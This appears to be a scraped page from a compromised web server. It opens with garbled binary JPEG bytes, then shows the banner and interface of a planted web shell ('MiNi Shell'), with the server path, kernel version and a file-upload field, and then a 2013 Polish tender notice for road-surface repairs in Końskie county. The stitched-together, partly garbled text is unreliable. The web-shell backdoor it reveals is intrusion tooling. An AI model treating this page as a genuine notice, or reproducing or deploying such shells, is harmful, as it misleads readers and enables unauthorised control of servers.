JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130201/17133-N-2013.html

<p class="kh_header"><b>Końskie: Naprawa ubytków w nawierzchniach - remontów cząstkowych w technologii powierzchniowego utrwalenia (przy użyciu zautomatyzowanego remontera) grysami bazaltowymi i emulsją oraz naprawa lokalnych nierówności nawierzchni i kolein masą mineralno-bitumiczną  wbudowywaną na gorąco w ciągach dróg powiatowych - teren Powiatu Koneckiego.</b><br>
<b>Numer ogłoszenia: 17133 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa ubytków w nawierzchniach - remontów cząstkowych w technologii powierzchniowego utrwalenia (przy użyciu zautomatyzowanego remontera) grysami bazaltowymi i emulsją oraz naprawa lokalnych nierówności nawierzchni i kolein masą mineralno-bitumiczną  wbudowywaną na gorąco w ciągach dróg powiatowych - teren Powiatu Koneckiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie w 2013 roku napraw, uszkodzeń (ubytków, wybojów) - remontów cząstkowych - w nawierzchniach bitumicznych w ciągach dróg powiatowych teren Powiatu Koneckiego, powstałych w nawierzchniach po okresie zimowym.
2.	Zamawiający nie jest w stanie przewidzieć jakie będą występować ilości  uszkodzeń (ubytków, wybojów) w nawierzchniach bitumicznych w ciągach dróg powiatowych (teren Powiatu Koneckiego), ilości przewidywanych napraw w zależności od potrzeb mogą ulec zmniejszeniu lub zwiększeniu. Do wyliczenia należności stosowana będzie cena ( koszt ) naprawy określona w załączonym zestawieniu kosztów faktycznie wykonanych napraw .
3.	Zamówienie obejmuje : 
Części 1 - 4 wykonanie napraw ubytków /wybojów/ w nawierzchni - remontów cząstkowych przy różnej głębokości ubytku w istniejącej nawierzchni - w technologii powierzchniowe utrwalenie. Remonty nawierzchni wykonywane będą przy użyciu specjalistycznego zautomatyzowanego remontera.
Ustalenie ilości i głębokości ubytków /wybojów/ w nawierzchni odbywać się będzie przy udziale przedstawicieli Wykonawcy i Zamawiającego przed przystąpieniem do realizacji robót.
Zestawienie wykonanych i wyliczonych obmiarów z poszczególnych dróg będzie dokumentem - załącznikiem do protokółu odbioru wykonanych zakresów remontów.
Warunki wykonania i odbioru remontów cząstkowych wykonanych w technologii powierzchniowe  utrwalenie Zamawiający określił w załączonej do SIWZ - szczegółowej specyfikacji technicznej D-05.03.17.
Na Wykonawcy spoczywa obowiązek oznakowania miejsca robót i bezpiecznego realizowania mając na uwadze to, że w czasie prowadzenia robót odcinek drogi nie będzie wyłączony z ruchu.
	Zamawiający dopuszcza możliwość rozliczenia wykonanych i odebranych remontów fakturami częściowymi - na koniec każdego miesiąca.
W okresie przygotowania postępowania Zamawiający nie jest w stanie określić dokładnej ilości i głębokości ubytków /wybojów/ w nawierzchniach, stąd też w oparciu o zrealizowane zakresy w poprzednich latach, przewidywane ilości dla niniejszego postępowania przyjmuję się:
-	naprawy powierzchniowych spękań, wykruszeń nawierzchni - około 1000 m2,
-	naprawy uszkodzeń płytkich do 2 cm głębokości - około 13.300 m2,
-	naprawy uszkodzeń średnich od 2 do 4 cm głębokości - około 12.100 m2,
-	naprawy uszkodzeń głębokich od 4 do 7 cm głębokości - około 8.900 m2.
-	naprawa zaniżeń, kolein, nierówności - około 100 Mg
Wynagrodzenie Wykonawcy ustalane będzie w oparciu o:
-	faktyczne ilości wykonanych i odebranych remontów 
-	ceny jednostkowe określone w kalkulacji cenowej, które obowiązywać będą  w rozliczeniach w przeciągu 2013 roku.
Poszczególne części obejmują drogi powiatowe na obszarze gmin (gmin-miast) jak niżej:
CZĘŚĆ 1.
Wykonanie remontów cząstkowych nawierzchni w ciągach dróg powiatowych na terenie Gmin Końskie, Gowarczów, Ruda Maleniecka, w przewidywanej ilości:
-	naprawy powierzchniowych spękań, wykruszeń nawierzchni - około 300m2,
-	naprawy uszkodzeń płytkich do 2 cm głębokości - około 4.200 m2,
-	naprawy uszkodzeń średnich od 2 do 4 cm głębokości - około 3.100 m2,
-	naprawy uszkodzeń głębokich od 4 do 7 cm głębokości - około 2.700 m2.
           (łączna długość dróg powiatowych o nawierzchni bitumicznej ok. - 141,2 km).
CZĘŚĆ 2.
Wykonanie remontów cząstkowych nawierzchni w ciągach dróg powiatowych na terenie Gmin Stąporków, Smyków, w przewidywanej ilości:
-	naprawy powierzchniowych spękań, wykruszeń nawierzchni - około 400 m2,
-	naprawy uszkodzeń płytkich do 2 cm głębokości - około 4.800 m2,
-	naprawy uszkodzeń średnich od 2 do 4 cm głębokości - około 4.200 m2,
-	naprawy uszkodzeń głębokich od 4 do 7 cm głębokości - około 2.600 m2.
           (łączna długość dróg powiatowych o nawierzchni bitumicznej ok. - 142,2 km).
CZĘŚĆ 3.
Wykonanie remontów cząstkowych nawierzchni w ciągach dróg powiatowych na terenie Gmin Radoszyce, Słupia, Fałków, w przewidywanej ilości:
-	naprawy powierzchniowych spękań, wykruszeń nawierzchni - około 300 m2,
-	naprawy uszkodzeń płytkich do 2 cm głębokości - około 4.300 m2,
-	naprawy uszkodzeń średnich od 2 do 4 cm głębokości - około 4.800 m2,
-	naprawy uszkodzeń głębokich od 4 do 7 cm głębokości - około 3.600 m2.
(łączna długość dróg powiatowych o nawierzchni bitumicznej ok. - 170,4 km).
Wykonawca przystępujący do przetargu może złożyć ofertę częściową, co oznacza, że może złożyć ofertę na jedną, dwie lub trzy części na jakie podzielono całe zamówienie.
Wykonawca składając ofertę dla każdej części zamówienia musi udowodnić że dysponuje specjalistycznym zautomatyzowanym remonterem (wykaz posiadanego sprzętu wraz z podstawami jego dysponowania)  na Części 1 - 3  .
CZĘŚĆ 4
Remont cząstkowy nawierzchni w technologii masą bitumiczną wbudowaną na gorąco na terenie wszystkich gmin powiatu koneckiego polegający na sfrezowaniu nawierzchni do profilu, pokryciu ubytku (łaty) połączeniem cienkowarstwowym (emulsją asfaltową) oraz uzupełnieniu ubytku masą mineralno - bitumiczną (warstwa ścieralna dla ruchu KR2) Lokalizacja robót - miejsca wbudowania masy ustalona zostanie z Wykonawcą.
     Warunki wykonania i odbioru robót zawarte są w załączonej do SIWZ - szczegółowej specyfikacji technicznej D-05.03.25.
     Cena jednostkowa określona w kosztorysie ofertowym będzie stosowana przy wyliczeniu należności Wykonawcy za faktycznie wbudowaną ilość masy. Zamawiający dopuszcza możliwość rozliczenia zrealizowanych i odebranych ilości robót fakturami częściowymi wystawianymi na koniec każdego miesiąca.
     Wykonawca składając ofertę na realizację robót ujętych w CZĘŚCI 4 dysponować musi:
-	otaczarką albo mieć możliwość zakupu masy w okresie przewidzianym na realizację robót, walcem drogowym do zagęszczania masy oraz innym sprzętem wymienionym w SST
          - naprawa zaniżeń, kolein, nierówności 			                   - około 100 Mg
4.	Roboty objęte niniejszym postępowaniem (podzielone na cztery części) będą w całości zapłacone przez Zamawiającego - za faktycznie wykonane i odebrane zakresy robót.
Podstawą zapłaty będą faktury wystawiane przez Wykonawców wraz z załączonymi dokumentami:
-	wyliczeniem powierzchni wykonanych remontów cząstkowych przy głębokości ubytków określonych w opisie, 
-	protokółu odbioru wykonanych remontów , 
Zapłata należności nastąpi w formie przelewu bankowego w terminie 30 dni kalendarzowych od dostarczenia faktury Zamawiającemu.
5.   Roboty prowadzone będą bez wstrzymywania ruchu lokalnego - przy wyłączeniu z ruchu  
 połowy jezdni, przy uwzględnieniu Warunków prowadzenia robót w pasie drogowym  
 określonych w załączniku Nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od obowiązku wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli  Wykonawca rowadzi działalność gospodarczą, w zakresie robót budowlanych, drogowych .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli w wykazie robót budowlanych dla każdej części zawarta będzie przynajmniej jedna robota o wartości nie mniejszej niż 300.000 zł brutto dla Części 1, Części 2, Części 3
oraz  80.000 zł dla Części 4 z potwierdzeniem, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca składając ofertę dla każdej części zamówienia udowodni że dysponuje specjalistycznym zautomatyzowanym remonterem (wykaz posiadanego sprzętu wraz z podstawami jego dysponowania)  na Części 1 - 3,
Wykonawca składając ofertę na realizację robót ujętych w CZĘŚCI 4 dysponować musi:
-	otaczarką albo mieć możliwość zakupu masy w okresie przewidzianym na realizację robót, walcem drogowym do zagęszczania masy oraz innym sprzętem wymienionym w SST</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli w wykazie w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnych za kierowanie robotami budowlanymi, znajdować się będą co najmniej 1 osoba z min. 5-letnim stażem pracy w podmiotach gospodarczych wykonujących roboty budowlane drogowe, posiadające uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku, gdy wykonawca polegać będzie na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, z informacji, o której mowa w rozdziale VI pkt 4 SIWZ, wysokość posiadanych środków finansowych lub zdolność kredytowa winna być równa co najmniej wysokości ceny ofertowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Pzp (załącznik nr 2.1 do formularza ofertowego)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.konecki.wrota-swietokrzyskie/web/guest/zdp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZARZĄD DRÓG POWIATOWYCH W KOŃSKICH  
UL. STANISŁAWA STASZICA 2
26 - 200 KOŃSKIE
pok. nr 328.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2013 godzina 10:00, miejsce: ZARZĄD DRÓG POWIATOWYCH W KOŃSKICH  
UL. STANISŁAWA STASZICA 2
26 - 200 KOŃSKIE
pok. nr 327 lub 328.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie remontów cząstkowych nawierzchni w ciągach dróg powiatowych na terenie Gmin Końskie, Gowarczów, Ruda Maleniecka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontów cząstkowych nawierzchni w ciągach dróg powiatowych na terenie Gmin Końskie, Gowarczów, Ruda Maleniecka, w przewidywanej ilości:
-	naprawy powierzchniowych spękań, wykruszeń nawierzchni - około 300m2,
-	naprawy uszkodzeń płytkich do 2 cm głębokości - około 4.200 m2,
-	naprawy uszkodzeń średnich od 2 do 4 cm głębokości - około 3.100 m2,
-	naprawy uszkodzeń głębokich od 4 do 7 cm głębokości - około 2.700 m2.
           (łączna długość dróg powiatowych o nawierzchni bitumicznej ok. - 141,2 km).
Wykonawca składając ofertę musi udowodnić że dysponuje specjalistycznym zautomatyzowanym remonterem (wykaz posiadanego sprzętu wraz z podstawami jego dysponowania)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie remontów cząstkowych nawierzchni w ciągach dróg powiatowych na terenie Gmin Stąporków, Smyków..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontów cząstkowych nawierzchni w ciągach dróg powiatowych na terenie Gmin Stąporków, Smyków, w przewidywanej ilości:
-	naprawy powierzchniowych spękań, wykruszeń nawierzchni - około 400 m2,
-	naprawy uszkodzeń płytkich do 2 cm głębokości - około 4.800 m2,
-	naprawy uszkodzeń średnich od 2 do 4 cm głębokości - około 4.200 m2,
-	naprawy uszkodzeń głębokich od 4 do 7 cm głębokości - około 2.600 m2.
           (łączna długość dróg powiatowych o nawierzchni bitumicznej ok. - 142,2 km).
Wykonawca składając ofertę musi udowodnić że dysponuje specjalistycznym zautomatyzowanym remonterem (wykaz posiadanego sprzętu wraz z podstawami jego dysponowania)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie remontów cząstkowych nawierzchni w ciągach dróg powiatowych na terenie Gmin Radoszyce, Słupia, Fałków..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontów cząstkowych nawierzchni w ciągach dróg powiatowych na terenie Gmin Radoszyce, Słupia, Fałków,w przewidywanej ilości:
-	naprawy powierzchniowych spękań, wykruszeń nawierzchni - około 300 m2,
-	naprawy uszkodzeń płytkich do 2 cm głębokości - około 4.300 m2,
-	naprawy uszkodzeń średnich od 2 do 4 cm głębokości - około 4.800 m2,
-	naprawy uszkodzeń głębokich od 4 do 7 cm głębokości - około 3.600 m2.
(łączna długość dróg powiatowych o nawierzchni bitumicznej ok. - 170,4 km).
Wykonawca przystępujący do przetargu może złożyć ofertę częściową, co oznacza, że może złożyć ofertę na jedną, dwie lub trzy części na jakie podzielono całe zamówienie.
Wykonawca składając ofertę musi udowodnić że dysponuje specjalistycznym zautomatyzowanym remonterem (wykaz posiadanego sprzętu wraz z podstawami jego dysponowania)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
